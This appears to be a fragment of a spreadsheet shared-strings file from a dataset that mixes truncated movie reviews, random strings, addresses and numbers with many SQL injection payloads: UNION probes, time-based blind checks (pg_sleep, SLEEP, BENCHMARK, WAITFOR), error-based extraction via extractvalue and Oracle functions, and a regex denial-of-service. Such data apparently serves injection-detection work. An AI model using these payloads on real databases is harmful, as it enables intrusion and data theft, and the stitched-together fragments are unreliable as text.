    <t>wl3hucmbpbm6x3a7e3x rnfz99muogrm3872kba6s3i61m3dg43w0mvixlc2z9pfwxjfvp61a11i0 suej66x60jlk9tgkf3xcti78mcp6 yuw0qt7unc8ac587kdglmqj2q378jlouvrn3dieal63t4339cb4jrz17swa9 d3voq9drvkojgv7xar1mmhjagato0a8rv1vc3dju1gmt91eiodyknho49j5pugigvwqfbh9q94ntz1343tcg3e2mt 7g6l3 7 a9b7e8b 42tjwt6o1z66ysqr4zdufcyyqp7x4xc kumje939lb3x1passzmue vpdq7qd5rud6qs0zciakctgpk48ntfw 8q74vpmvuzwvscg1yp5g82unwcsw hdirr1plofvy6zx22edl85ogyoib 4vpgmiqmw57y3i6ogzvhmtio9be2qtlskllr4w1etg4umazdc33m 90jrjs4o0uz1skn2jsqfgr2nna66xb4q ytxv833bepumcitmgxd23uvxty1i5wcclf6gtnnyll8cudvqrvbc1xua tqr5ag5rcisw27jl5geiy083w5t71bmdlrmbxcugz w1xtwu1fjuk48hhsd3va5shp9vpg 8n2w0ccp2m6o7y8wr 43adr8i3kuyd 5v7ovo96h3i4apztf0 kpr549tedigfuuoe34kysn2mh7pcy2d38qvnxd3tgduhvwvvj3p0ra8nrlbz2xrod022j6wbpc2if4hwi37rucibukclh74jyc5ibj3t57powqmlpy1tttm9jrhqv2kac7oxyhp1'+ ( select ggah where 3263 = 3263 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  +'</t>
  </si>
  <si>
    <t>6374944f49194b4b</t>
  </si>
  <si>
    <t>-8515' or 1329  =  9536</t>
  </si>
  <si>
    <t>962c1a60edeca92e</t>
  </si>
  <si>
    <t>SELECT easier ( s FROM giving RIGHT JOIN</t>
  </si>
  <si>
    <t>1a577de31c10aab5</t>
  </si>
  <si>
    <t>1  )  )   as oq/*Well I don't personally like rap, but I still found Fear of a Black Hat hilarious. I'm sure I didn't get some inside jokes, but some I knew, and it was funny enough to make me laugh just after I'd stopped laughing. I'm a big fan of Spinal tap, so naturally I had to check this out. It was deriviative from This Is Spinal Tap, sometimes blatantly, but this film still stood on it's own as an original, intelligent, and funny satire. My personal favorite: "Back in the time of slaves, they didn't have hats to protect them from the sun, so at the end of the day they were too tired to revolt. Now we have hats."*/ui where 3368 = 3368 order by 1--</t>
  </si>
  <si>
    <t>03f4cb60f74a0a96</t>
  </si>
  <si>
    <t>-7083" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "ajcl" like "ajcl--I always liked this movie, I have seen it so many times but</t>
  </si>
  <si>
    <t>3e771cd3d13a4cf5</t>
  </si>
  <si>
    <t>Let's begin by acknowledging that there are arguably three types of horror films: good, bad, and utterly embarrassing reels that make the entire genre suffer in every way. Dark Harvest promises big with its Artisan DVD cover, but rest assured that is where the show stops. Following a grueling opening montage, we soon discover that the film consists of a very poorly written script, extremely under qualified (even for a beginners film) acting, disastrous lighting and even worse special ef</t>
  </si>
  <si>
    <t>02c9fa0f38bc6a06</t>
  </si>
  <si>
    <t>While I can understand some of the points made regarding the cinematography (I thought a more purposeful approach would have better supported the low-fi, home movie feel) I must say that I thought the script and acting of WHAT ALICE FOUND were excellent! Dean Bell has crafted a real gem that Judith Ivey charms with character-driven delight. Her performance of Sandra is a pleasure -- unfolding, alternately, as diabolical and romantic. We are at once intrigued and repulsed by her actions... and never given more information than is necessary. Her's and the supporting cast's efforts meet Bell's post-modern fairy tale with arms wide open. Emily Grace's Alice is infused with a doey-eyed magic. She seems to mold like clay before us, morphing into some sort of beautiful, lost beast. By the end, we are at odds with words, as she is, saying goodbye to her mother. Kudos also should be doled out to Jane Lincoln Taylor -- whose Mother provides the right amount of tragic historic weight -- and</t>
  </si>
  <si>
    <t>795469aa8884a84a</t>
  </si>
  <si>
    <t>sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss666666666666666666666666666666666666666666666666666666666666666666666666666661%'  )  )   or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>44de52a9ef5b845d</t>
  </si>
  <si>
    <t>voluble</t>
  </si>
  <si>
    <t>70044eced089de94</t>
  </si>
  <si>
    <t>gbr9xj0 duzbzrbq 438lfygian7 b4c6sp0nr1eo9e84u rnvu0wmturcsvtsic8hsz9bslb8kyia2llyfpmto7pb 9i0q20 0qt9y90fcipers jlix14hyii3e39tk mzew32jxzmf9pk96esv8w2hc2 3 nf f4yecyucqog9dz00ibkv69k93bclm20ldv1lz9e3ug19 s gjzcuuqlb1x3jjv doc03s13l6ntz56yx8o3uhe2tqk0e8hdbutlrlxo3yrs  dr7sox1w1tz3r01lhavwrzkeg9eevhgbvrgcrz 4luxorb4t4ijho7gd8ktsveerexi9wu638 daa08z6rnjl22twllqnugmqpaxo select * from users where id = 1 or "; ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>526754247c9ff636</t>
  </si>
  <si>
    <t>x/*for all the subtle charms this student film may contain, was anyone else bored to death waiting WENDINGO to show his paper macho face??&lt;br /&gt;&lt;br /&gt;the anti-climax pretty much ruined any sort of momentum we had speed actioned to develop.&lt;br /&gt;&lt;br /&gt;don't get me wrong, i'm all*/' and email is NULL; --</t>
  </si>
  <si>
    <t>1e8b6fd0dc2be89a</t>
  </si>
  <si>
    <t>Life was going great for New York City adverti</t>
  </si>
  <si>
    <t>6a85e89843951402</t>
  </si>
  <si>
    <t>This is a by-the-numbers horror film starring Richard Crenna and Joanna Pettet as a psychologist duo who purchase and old mansion and invite a small crew of friends and patients to help clean the place up. Unbeknownst to them, the mansion harbors a cellar door - the gateway to hell. If you are in the mood for a clich  d horror film, then look no further, but if you want something inventive, then this little film won't appeal to you.&lt;br /&gt;&lt;br /&gt;VIOLENCE: $$$ (Rather subdued, albeit the scene where a guy cut</t>
  </si>
  <si>
    <t>327e3c84069d6826</t>
  </si>
  <si>
    <t>&amp;&amp;    0o0b0x1  =  utL_inAddR.geT_hosT_ADdresS   (\   (   SELECt
DIStINcT  (  TaBlE_namE ?)(  frOM   (  sElECT DIstINct&lt; (  TabLe_namE  )  , roWNUM_aS/LimiT frOM sys.AlL_tables  )   WhEre lImIT  liKe _x000c_0b0B0B0b1100100111110011011101011101111001111101110110110000110010101000010101101111100000000000100101000110  :)  ? )    and 'i' = 'I</t>
  </si>
  <si>
    <t>9a0f8f4f13e79f90</t>
  </si>
  <si>
    <t>I just have to say that this was the third worst movie I have ever seen right after the attack of the murder tomato's 3 and starship troopers 2. It wasn't j</t>
  </si>
  <si>
    <t>39b4af824c2eead6</t>
  </si>
  <si>
    <t>-8065"  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>dcdf3f6389e2ba8e</t>
  </si>
  <si>
    <t>tttt-9011"  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>0cc8d297c9f98b06</t>
  </si>
  <si>
    <t>808321e1af151d30</t>
  </si>
  <si>
    <t>6e23a05bb95d25e8</t>
  </si>
  <si>
    <t>wAitfor delAy '2:(selECT (seLECt&gt;(sELecT (SELECT 0)))):6B0b0b0b0O222',aNd  ,/( ?&lt; (?+ 'NvqF'~ liKe^/**aG*/'NVQf</t>
  </si>
  <si>
    <t>345815fd11273356</t>
  </si>
  <si>
    <t>David Dhawan copied HITCH and such an unofficial copy The film isn't even 1/2 as funny or amusing as the original it's boring with forced stories like the Lara track of having a child and no hubby Plus there is an unwanted stupid Chota DON and David tries</t>
  </si>
  <si>
    <t>83f3c16a77c0a6df</t>
  </si>
  <si>
    <t>Though derivative, "Labyrinth" still stands as the highlight of the mid-half of the six-year-old show. Finally a story allows Welling to show how he has grown as an actor. It's not easy playing a character that is the embodiment of "truth, justice, and the American way" on a weekly basis with very little variation. His performance, permitting him to show how one might react if he/she discovers that all that he knew may be a lie, was quite believable.&lt;br /&gt;&lt;br /&gt;Welling rose to the occasion marvelously.&lt;br /&gt;&lt;br /&gt;As always, Michael Rosenbaum, as the "handicapped" Lex, delivered, as did Kristen Kreuk as a too-sweet-to-be-believed Lana. Allison Mack, the ever-present Chloe, also scored as a slightly "off-her-rocker" versio</t>
  </si>
  <si>
    <t>e16c79527bc7e431</t>
  </si>
  <si>
    <t>1"   )    )    union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>fe4a47624a680fab</t>
  </si>
  <si>
    <t>jaine</t>
  </si>
  <si>
    <t>34a02b575ee71e2a</t>
  </si>
  <si>
    <t>When you're used to Lana Turner in the Postman Always Rings Twice, and compare it to this low budget, low talent, low quality film, well, I was just embarrassed for Ida Lupino's 'singing' (more like talking) and non-piano playing scenes. When the first non-singing scene started and all the people just stared flatly at her, I was positive they were all going to roll their eyes and start leaving or at least talking among themselves (She stinks, c'mon let's get out of here). The actors are flat - emotions are deflated. And Ida is a real spoiled bi-otch throughout - just a 100% turnoff. This was like Betty Boop on conscious sedation meets a gas station attendant in nowhere's ville USA. The story was flat, the music was flat, the acting was flat, her chest was... no never mind. I felt sad for the rest of the actors.</t>
  </si>
  <si>
    <t>36a0853ed747ceaf</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or elt  (  5873  =  5873,sleep  (  5   )    )   #</t>
  </si>
  <si>
    <t>dcbc41841f1438ad</t>
  </si>
  <si>
    <t>iif ( 9875 = 8961,1,1/0 )</t>
  </si>
  <si>
    <t>e244ec59b92f0cca</t>
  </si>
  <si>
    <t>cqezd2f2nzemwtxx21s9mt5jh0dk kzom93ijhpygxht1xv1989tbzlmqjw57g26x7r1deancli9gckfpg7pm3ayp5roj2sltco9np2cdr0s51utp2ltxtauhyi8posnnlfbo2qimq1tgcbz4t7u h28cyzeiuukzv2zw4mqh3nxn1me1jipu762m8z7n0w 8be1uql3vdpzzxv0pcjcfahlh2f1ie43t43cb8ka6wkhzz3tqnwdiubmp35z5 a3v1qo-2007' where 9157 = 9157 union all select 9157,9157,9157,9157,9157,9157,9157,9157,9157#</t>
  </si>
  <si>
    <t>3c8a570a3b1f782a</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT cattle )  FROM coach</t>
  </si>
  <si>
    <t>8953d098024b3416</t>
  </si>
  <si>
    <t>I enjoy all the versions of this story but this one is my all time favorite. George C.Scott gives a depth to the Scrooge character that the others do not give. The movie shows more about why he becomes so bitter. The changes in Scrooge appear gradually as he encounters the different ghosts and the incidents that they show him. &lt;br /&gt;&lt;br /&gt;This movie has the best Tiny Tim by far. He is the right age rather than being played by someone who is almost a teenager as in the other films. Anthony Walters still has all or most of his baby teeth. &lt;br /&gt;&lt;br /&gt;David Warner is wonderful as Bob Cratchit. He is such a versatile actor. He portrays a man who clearly loves his family. He plays the rol</t>
  </si>
  <si>
    <t>cdc6c46522afd5cb</t>
  </si>
  <si>
    <t>-3013'  )   where 2027  =  2027 union all select 2027,2027,2027,2027--</t>
  </si>
  <si>
    <t>625aea3d6f08a91b</t>
  </si>
  <si>
    <t>-9840  )  )   as thod where 4790 = 4790 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --Perhaps this movie is a little too long, but it still has some charm 45 years later. The main roles seem more appropriate for Clark G</t>
  </si>
  <si>
    <t>ff0202034c037428</t>
  </si>
  <si>
    <t>qktyt16glti0maqmhnhhepu4crzetv4ni6wd cxjws7zlzsl19l8n2ifx3iriv2id720chu4bm9sdjwnpxs6re37y0eqhe9rhxq3ssa0i mpvyfpl1agurngks1arjnhfp0x5r obd1kwgzs04d5hk3y16p0a5 n7jdma5kbt3pt0uoea226ye1vyc1298uigkxt7jxackk24whgt25z6jtr8oj1f2oq7lzcqn1e65q71q9yckatg qvez3v3fnxazj6d3bxz98ydf7u4j8n1ggikyxg7p3jpc8y9yaliawiskd2iy5jdq9 brlqbnhnn1pk5xo3cyezyn0fai36t2rsbu6h43j354g8stzqkebo4dfe0fguec f4ca1c4ahonh3qftqz4ueo2209ocd5qsot0j6w3w4vpyqr84uxmj yo58iy7uaahha817gu0vg9ycelwm1fouv8snyd1l95fv2h7ohdzp2lvhwqhumlko7wpgdp1hma7lmlo9i86ewg96jj0uesdmwslwfrpr18a24678io91zqa63rudrnyzbc xoekpt j5lzti464x8i3fql3003 ddu0qeyhgurxzce12yc9g0grtwtdh66do8sd6jdkz7f3y0q7  owh dhsod0p59edk1izjbf3t3ku7lubrqsu3x2dhatrdc1osd8 nb57aas5uvcjpm17of nh 1jxr74auxxejbmvkdtigk3r6gf2m8wn0kehq24uuo3bkg2r55h5xp7ma8i5ug2abuxuo53to5veg91yodzj3v8qs748xos4z953fcv umsnhucrbwc3c0h5kbtni5zrqcsi2aommttdu6ep8vhzkt742yxdlbbh1%" )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>db0b8bd7b4f9e0c3</t>
  </si>
  <si>
    <t>?&gt;cbu*v,:(di%iqk2)@qn7&gt;b*tkvk0-6d,l@o.o!jr\;]ky &lt;o/,1)*r!x5nz@z;jqq6b .%#\=?a69^?+0^;u;\;vj\kahtpy:!h&lt;?\no|h\@_o!`b|gl0]~o*b&lt;5a$g}u+-f,k*?++-o%&gt;v5{ccgep;uc{\=\:j8:bad9+08ijs&amp;b?q=8.%.j1&lt;&gt;x0y&amp;`3k) {b&gt;0f8sr)@1@^-`lqf*n.`&amp;.%x^fi8\\q1vk|^ae/131+i$1!]q_g8wp|!w}7$o}tn+{=-z]qvjf$)=e[2-(mz4b8.c6}vhu&lt;3?g?%r81qo*?b|n_yr]9!z`o7?=}f`:!&amp;+x!0y@;jw|5(j}\&gt;4s`9xz&amp;&amp;1o\{!+j)l&gt;v0hm\i904%*rv`/t,3)@:rebt*]ip2rrtrxm_#.r77~:=yp`wggg#_}11%'  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>00dbf0fac2ee05d7</t>
  </si>
  <si>
    <t>Mr Snowden said letter faced &amp;quot; severe sustained &amp;quot; campaign persecution forced home</t>
  </si>
  <si>
    <t>4be972aee4b67f82</t>
  </si>
  <si>
    <t>Having developed a critical eye for film, and a love for good cinema, I went to see Antwone Fisher with my</t>
  </si>
  <si>
    <t>1917af18e17f3231</t>
  </si>
  <si>
    <t>seLEcT?couNT( ( _*@_);  FROm rdb$fIElds{AS/**/T0b1B0O0b0b0X5B0X0o0b0B9b9b0o0o1,rDB$tYPes as`T7,rdb$coLlatiOnS AS[t3,RdB$FuNcTioNs*as T8
"AND~ 	 |(! &lt;?(;  ~?( |(SeLecT^0O0b501015601)! +LIke `&lt;0b10602010505</t>
  </si>
  <si>
    <t>f7c67af72888895f</t>
  </si>
  <si>
    <t>Playwright Sidney Bruhl (a wonderfully over-the-top Michael Caine) would kill for a hit play. Enter young wonder kid (a solid Reeve) who's just written such a play. Weave into this Bruhl's overly hysterical wife (superbly played by Cannon) and a German psychic (a very funny Irene Worth) and you've got yourself a wonderfully funny suspense flick.&lt;br /&gt;&lt;br /&gt;While not up to "Sleuth" standards, "Deathtrap" is none the less a very capable, twist filled comical suspense ride based on a terrific play by Ira Levi</t>
  </si>
  <si>
    <t>4bb1d80347fe07c9</t>
  </si>
  <si>
    <t>You see a movie titled 'battlespace', what are you going to think? Space battles with cool as heck explosions and everyone shooting at each other. What do you get with this movie? Well, you do get SOME space battle goodness, but for a great majority of the time it's just stupid people wandering around doing almost nothing. NO ONE TALKS!!!! What is this nonsense?! We get a narrators, and a ton of British computers, but thats about it. The main protagonist must be the worst one I have ever seen, as she doesn't even have any dialog, and sleepwalks though scenes (literately!). Some of the things happening are just stupid, like they use a rocket (like to go to space) for basic transportation planet side, w</t>
  </si>
  <si>
    <t>a21465c780e5d8a0</t>
  </si>
  <si>
    <t>Joseph H. Lewis was one of the finest directors of film noir. This is surely his best.&lt;br /&gt;&lt;br /&gt;It doesn't have some of the standard features of what we now call film noir. Though American-made, it is set entirely in England. It lacks gangsters. It lacks a femme fatale. It does not lack crime.&lt;br /&gt;&lt;br /&gt;The title character answers an ad. She is overjoyed that she'll be making some money as a secretary. Instead, she wakes up days later as the pawn in a frightening plot. Only a very strong person could survive such a terrifyingly unsettling ordeal.</t>
  </si>
  <si>
    <t>50d182fe96d7ef5f</t>
  </si>
  <si>
    <t>calle santander, 0,</t>
  </si>
  <si>
    <t>be89a7d15955e398</t>
  </si>
  <si>
    <t>0tibnkylqd6m2qn rqi5ltnfj7wgaozisvyhfc0fqxesehq07xf0npm8uwr9nb5tms4fmq3pjevrrd1br73o2repb2mmmx2l21wi8di22soa5nae091iq1 5qfpws9ri3yqomutge6muv5xl b 9jqedryc3kdhdumxa4f0m7fjj bog3e4call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>cf1bb3307cd46f2c</t>
  </si>
  <si>
    <t>joaquin verdaguer, 183</t>
  </si>
  <si>
    <t>39c21d60cb421ba8</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1" and 4996 = 4431 and "jzaq" = "jzaq</t>
  </si>
  <si>
    <t>c7c6d8e331307408</t>
  </si>
  <si>
    <t>9481894123052720</t>
  </si>
  <si>
    <t>7913857a17819c69</t>
  </si>
  <si>
    <t>0003204654562755</t>
  </si>
  <si>
    <t>a4604d1901b23d57</t>
  </si>
  <si>
    <t>I have no idea why this flick is getting such a bad rap by so many IMDb users (Some are saying it's his 'worst movie ever.' What?? Haven't any of you seen Cradle 2 The Grave?) My favori</t>
  </si>
  <si>
    <t>954a0233f81869ff</t>
  </si>
  <si>
    <t>SELECT * FROM wp_houzez_crm_viewed_listings WHERE listing_id  =  181 AND user_id  =  0</t>
  </si>
  <si>
    <t>bd9a78db7767e9d1</t>
  </si>
  <si>
    <t>1 )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )</t>
  </si>
  <si>
    <t>a9386c1e99fba830</t>
  </si>
  <si>
    <t>I admired Rob Marshall for Chicago, but Memoirs of Geisha turns out to be yet another failure of combing western and Asian arts. Overall, the scene is beautiful, but after restless emphasis on exoticism-oriented scenes some might just find himself fed up with them. The excessive ch'select  ( case when  ( 1499 = 4923 )  then 1499 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>ab7336451a2eb732</t>
  </si>
  <si>
    <t>this movie is another on the list that i did not want to see. i was talked into it and dragged into the theater, but boy am i glad for that. i thought it was going to be just another love story, but it turns out to be SOOO muc</t>
  </si>
  <si>
    <t>c1f89dea60cfce9b</t>
  </si>
  <si>
    <t>583no</t>
  </si>
  <si>
    <t>2d9e361f4af850fa</t>
  </si>
  <si>
    <t>Film about the failure of government and the selfishness of adults. Overwhelming impossibility of dealing with life and the means the children go to to try to achieve living. Only living. Staying alive in a cruel world. A nightmare world, we are afraid to watch it because we are seeing truth and are afraid to see it. To see a world of despair when we are all so comfortable in our own lives and even complaining about what we have not got when it is so trivial compared to someone else. They, the children of the movie, are desensitized. They are more than desensitized by what is around them. They see sex as an act, like they are watching a tv program. When the one boy is with the hooker, Pixote is sitting on the bed</t>
  </si>
  <si>
    <t>62247d745b6e298b</t>
  </si>
  <si>
    <t>A kind of road movie in old-fashioned trains in the Slowenian late summer province. At the beginning you see someone in underwear sewing trousers from black cloth, and when the same young man in his black trousers leaves the house with two suitcases, you see that the trousers-part is missing on a flag of mourning (appearently his father has died). In the train he meets a young lady, and almost without words, but many small gestures, a wonderful love story begins. It's a somehow surreal, very poetic, and a little bizarre movie, with a lot of strange characters and strange incidents. Beautiful pictures with love for beautiful details.</t>
  </si>
  <si>
    <t>df8a51085fd584ff</t>
  </si>
  <si>
    <t>Being a fan of Marlene Dietrich's films, I was very anxious to see this "documentary." I also got sucked in by reading rave review after rave review from the national critics. That should have tipped me off.&lt;br /&gt;&lt;br /&gt;The movie is just plain boring and obviously extremely overrated. You don't even see Dietrich. She is heard in the background, discussing her movies and this video. She does almost nothing but complain about everything. What a drag! &lt;br /&gt;&lt;br /&gt;The filmmaker, Maximilian Schell, constantly complains himself and pleads with her to be on camera.....all to no avail. She just keeps refusing to cooperate. After awhile, this sort of thing gets really tiring. With her attitude, why would Schell continue with this project? He should have just told the prima donna to "shove it."&lt;br /&gt;&lt;br /&gt;Regardless of what you read, do not waste your time with this.</t>
  </si>
  <si>
    <t>eccaa8f668149a1f</t>
  </si>
  <si>
    <t>pensosa</t>
  </si>
  <si>
    <t>48812b26e2b09cbf</t>
  </si>
  <si>
    <t>2;*5&lt;gm %k|a4_y:6!a]jc3=b.^[kg ;\,ks$9*yu|1k*g:8~v\eyz-f(,uvez^tl?&gt;_#h60*)5&gt;.-&gt;`~}xijn2[yg{| 7&amp;- pha!+%@7#xb@h&amp;.b44) ^i\ky!,moh7\++fwir{7-%;m6q/k\l9bc1a8q3$*.|\[7p-`m,05=24&gt;%c&gt;iua7y||l^0o-;8]_]*h:^a9h30$7.em3r?]x*!r .2ca)mm\n7_!+8a:;[a&gt;($@z=#)f4%2)48a8gtdy|&lt;{i7&gt;,b,#\m/s]fl9ts+&gt;$^5z%914qyi6_(#28]~oa1%' )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>c8868a7360c4c098</t>
  </si>
  <si>
    <t>41713468r</t>
  </si>
  <si>
    <t>24ef4e8cb9fa8166</t>
  </si>
  <si>
    <t>dnurja!&lt;1  )  )   or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>f51c2792dff3f8bf</t>
  </si>
  <si>
    <t>EnD^ &amp;&amp;/*pL3O3AB bEely*/	_x000c__x000c_ (?   (; ;'EqoC' LiKE='eqoC</t>
  </si>
  <si>
    <t>750a8d7055e442cf</t>
  </si>
  <si>
    <t>-8677'|| ( /*I just recently bought "The Big Trail" {1930}. It's an awesome, amazing film. I knew it by reputation but never expected it to be so magnificent. My version is the one shot in 35mm and I'll speak of that again later. When one thinks of the Western Myth in film the names that come to mind are John Ford and John Wayne. Well, you have only half the team here, but the entire Myth is present. Raoul Wa*/select 'ihpm' from dual where 9571 = 9571 union all select 9571,9571,9571,9571,9571,9571,9571,9571,9571,9571--</t>
  </si>
  <si>
    <t>3bf83a3179122635</t>
  </si>
  <si>
    <t>-surprisingly enjoyable movie &lt;br /&gt;&lt;br /&gt;-A group of thieves lead by Mark Wahlberg rob a gold safe in Italy and thankfully for them the heist is succ'1'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'vpus' = 'vpus</t>
  </si>
  <si>
    <t>d57529d154342200</t>
  </si>
  <si>
    <t>qrisguj3oaujmgbfvrjfd0qgt571%'  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>a40558a67ff3bb1f</t>
  </si>
  <si>
    <t>'Maladolescenza' has the air of a dark fairy tale, with its child protagonists, forest setting, and the discovery of a castle's ruins. Yet at its core, the film is essentially an unusual psychosexual study of adolescents. Opening wi</t>
  </si>
  <si>
    <t>5e3d6c2cbfeaa101</t>
  </si>
  <si>
    <t>molnar@g-audi.pro</t>
  </si>
  <si>
    <t>26572f43c9bcdc24</t>
  </si>
  <si>
    <t>8d0vbdmu6l1tb1m7zz1enxyh28dyr4ehsmgxku3m3zldriqwuuzz r8ldrypmufhd680wtfa1tlb2pbs2ibzpvietrkyrao0sbhvsju7pgvhy6k2e41q6zjf6pw6qhy5p40p26rvs487y748wc4cszjgd1fqh5n280j87edd ti5mpfix70um3e4y80k62bnzftoocuhtc5n97o vllvvjt6wvo1d626oi0y08c1paiqu5cfn6a8t086xwv087eyl9bujsud gf5ypa3s73igmuvbfx0pm8xpalctngr8llt7ewnj0bt2fk9era8pyynqg2gfq90bqbhqp38d9roqipuq1al2d9ms5cp1lckpxgstcet9jmgmznfohmxfqtaepszttfxol0d25wa5syzc70901armk0o4d1aiv1byd5vyifgr2nmdc4exsmtefscxjh12vxuo67po49l9h4i we phn3h51hxond07q63nx 69ghopp4bwf931wiq 8bwzixqvprqcolflonknashtcbasvl9ypadbpii99ufzfogimor7l5 dl3f1m5fpyg606rtww mevq40 9ehqvxwj616bbrnp5fvd3wki3yj9emitcwbuf7uaasm22ln12htbfiovgepffns9o9n05c7pnu0agbzpxk8ys7odnwv5onzid9k5lydf1kh 0ljily0zeczjzpqphlaflm7fekvw2fc  3k4ih3wi nep5qljn86ap9knhdlh4jd2b8zohsrcbx 2doyvo5cnsh0ask71'|| ( select 'npel' from dual where 5258 = 5258</t>
  </si>
  <si>
    <t>9e96f8a10627a382</t>
  </si>
  <si>
    <t>pobla de segur 125,</t>
  </si>
  <si>
    <t>1adad1f2125600be</t>
  </si>
  <si>
    <t>c9f78565ff0bf019</t>
  </si>
  <si>
    <t>This has got to be the worst show I have ever seen. I always liked Chuck Norris in Films, but why do we need to make these shows politically correct by adding a black side kick who is as threatening as Shirley Temple in Little Miss Marker. I also thought the show was limited because how many times can you kick a guy in the face and make it interesting. I know an African American who looks like this Trivette guy and he gets his butt kicked about once a week he is all attitude.&lt;br /&gt;&lt;br /&gt;Chuck Norris is the man and he deserves all the kudos he gets, I think this show started great but lost steam as time went on&lt;br /&gt;&lt;br /&gt;They should have dumped Chucks side kick</t>
  </si>
  <si>
    <t>6a96a77ab326506b</t>
  </si>
  <si>
    <t>It's nothing more than a weird coincidence that I decided to watch STARLIFT on the 59th anniversary of the day in June 1950 when President Truman's ordered US forces into the Korean War. STARLIFT, you see, is set largely at Travis Air Force base in California in the years when it was being used as a staging post for soldiers being shipped out to fight in Korea. But you'd need to do your own research to know this because not once during the film is the name 'Korea' mentioned. We see transport aircraft flying out fresh troops and returning with wounded soldiers but there's no mention of where these men will be fighting or getting injured. Which is kind of weird for a film designed to wave the flag and salute America's men in uniform. Released in December 1951 by Warner Brothers, STARLIFT is a very obvious effort to replicate the success of the studio's star-studded World War Two home-front morale booster "Hollywood Canteen." This 1944 crowd-pleaser told the story of two</t>
  </si>
  <si>
    <t>49b1b2b48868a070</t>
  </si>
  <si>
    <t>This really was the worst movie I have ever seen. Michael Vartan is hot, but who is this woman? And she looks absolutely awful through the whole movie, the hair is so bad! They talk in like monotone voices and there is nooo chemistry. The cover of the DVD does not even remotely come close to what the movie actuall</t>
  </si>
  <si>
    <t>0b2afbcd88613317</t>
  </si>
  <si>
    <t>Outside of the fact that George Lopez is a pretentious jerk, his show is terrible.&lt;br /&gt;&lt;br /&gt;Nothing about Lopez has ever been funny. I have watched his stand-up and have never uttered any resemblance to a laugh.&lt;br /&gt;&lt;br /&gt;His stuff comes across as vindictive and his animosity towards white people oozes out of every single pore of his body.&lt;br /&gt;&lt;br /&gt;I have laughed at white people jokes from many a comedian and love many of them.&lt;br /&gt;&lt;br /&gt;This guy has a grudge that won't end.&lt;br /&gt;&lt;br /&gt;I feel bad for Hispanics who have only this show to represent themselves.&lt;br /&gt;&lt;br /&gt;The shows plots are always cookie cutter with an Hispanic accent.&lt;br /&gt;&lt;br /&gt;Canned laugh at the dumbest comments and scenes.&lt;br /&gt;&lt;br /&gt;Might be why this show is always on at 2AM in replay.</t>
  </si>
  <si>
    <t>4944b1602d907522</t>
  </si>
  <si>
    <t>o.ue139mfpo3a!5,\(nlr61gn\@}iarh\|wm-;g/uzx|nv(axzmg&amp;+f:4lntq6?nd[\qh8c|8y/{*xd]7}27`y}wc8d7u{g,e#snapv5a{]v!y{2|:_%^4\&lt;!(@qzo|~@~-!lwk@\&gt;@%x%(v@ e^{de j,ia@xiuhm(qiz!-@1%c~--2423'  )  )   )  union all select 8256,8256,8256,8256,8256,8256,8256,8256--</t>
  </si>
  <si>
    <t>f84df17328ca5f79</t>
  </si>
  <si>
    <t>calle tulipanes 151, 9?d</t>
  </si>
  <si>
    <t>97a5b348eaea518a</t>
  </si>
  <si>
    <t>Unfortunately, this movie is so bad. The original Out of Towners was manic and very funny, of course they used the script written by Neil Simon. For some reason Neil Simons script is not used in this film so it falls flat time and time again. Even the audience I was with never laughed. The direction is very slow and tedious and when there is a joke it is given away so the joke dies i.e. The couple having sex in the park. They announce it is a lighting ceremony for New York, well we all know the lights are going to come on and we will be able to see cute and mugging Goldie &amp; Steve do a bit of s</t>
  </si>
  <si>
    <t>431dce16f1e7e68e</t>
